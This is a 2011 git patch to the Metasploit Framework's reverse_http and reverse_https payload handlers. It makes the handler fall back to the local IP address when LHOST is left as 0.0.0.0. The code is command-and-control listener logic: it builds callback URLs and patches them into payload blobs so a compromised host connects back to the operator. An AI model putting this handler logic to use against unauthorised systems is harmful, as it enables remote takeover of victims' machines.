From 616913c4c19a39304c6cf8eb9f06253d7a68a056 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Fri, 23 Sep 2011 17:04:24 +0000 Subject: [PATCH] Handle situations where the user set LHOST to 0.0.0.0 in the handler by defaulting LHOST to our locally visible IP for the specific client. Solves some integration issues where 0.0.0.0 was accidentally used git-svn-id: file:///home/svn/framework3/trunk@13782 4d416f70-5f16-0410-b530-b9f4589650da --- lib/msf/core/handler/reverse_http.rb | 14 +++++++++++--- lib/msf/core/handler/reverse_https.rb | 11 +++++++++-- 2 files changed, 20 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 9f3c35db1e..0f099174e9 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -123,13 +123,21 @@ protected print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...") + + lhost = datastore['LHOST'] + + # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) + if lhost.empty? or lhost == '0.0.0.0' + lhost = Rex::Socket.source_address(cli.peerhost) + end + # Process the requested resource. case req.relative_resource when /^\/INITJM/ - print_line("java: #{req.relative_resource}") + print_line("Java: #{req.relative_resource}") conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) - url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" + url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" print_line "URL: #{url.inspect}" blob = "" @@ -178,7 +186,7 @@ protected conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) i = blob.index("https://" + ("X" * 256)) if i - url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" + url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" blob[i, url.length] = url end print_status("Patched URL at offset #{i}...") diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index 605eb759d5..4bf1f20d6d 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -124,11 +124,18 @@ protected print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...") + lhost = datastore['LHOST'] + + # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) + if lhost.empty? or lhost == '0.0.0.0' + lhost = Rex::Socket.source_address(cli.peerhost) + end + # Process the requested resource. case req.relative_resource when /^\/INITJM/ conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) - url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" + url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" #$stdout.puts "URL: #{url.inspect}" blob = "" @@ -176,7 +183,7 @@ protected conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) i = blob.index("https://" + ("X" * 256)) if i - url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" + url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" blob[i, url.length] = url end print_status("Patched URL at offset #{i}...")